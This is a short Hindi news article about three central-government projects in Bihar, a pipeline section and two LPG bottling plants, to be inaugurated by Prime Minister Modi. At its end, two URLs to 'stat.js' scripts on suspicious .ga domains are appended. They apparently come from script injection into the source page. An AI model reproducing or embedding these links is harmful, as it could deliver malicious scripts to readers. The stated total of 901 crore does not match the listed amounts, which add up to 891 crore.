बिहार में केंद्र सरकार की ओर से 901 करोड़ रुपए की तीन परियोजनाओं का शुभारंभ किया जाएगा। यह कार्य प्रधानमंत्री नरेंद्र मोदी के द्वारा वीडियो कॉन्फ्रेंसिंग के जरिए किया जाएगा। आइए जानते हैं इन तीनो परियोजनाओं के शुरू होने से बिहार को एवं किन जिलों को फायदा मिलने वाला है।
901 करोड़ रुपए की इन तीनों परियोजनाओं के तहत पारादीप हल्दिया दुर्गापुर पाइप लाइन के दुर्गापुर बांका खंड में 634 करोड़ रुपए से 193 किलोमीटर लंबा पाइपलाइन एवं बांका जिले में 121 करोड़ रुपये से एलपीजी बाटलींग प्लांट लगाया जाएगा।
इसके अलावा बिहार के पूर्वी चंपारण जिले में नए एलपीजी प्लांट का निर्माण 136 करोड़ रुपये से किया जायेगा . जिसका शुभारंभ प्रधानमंत्री नरेंद्र मोदी करेंगे। बता दें कि इस उद्घाटन समारोह में प्रधानमंत्री नरेंद्र मोदी बिहार के मुख्यमंत्री नीतीश कुमार उपमुख्यमंत्री सुशील मोदी एवं केंद्रीय पेट्रोलियम मंत्री समारोह को संबोधित करेंगे।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms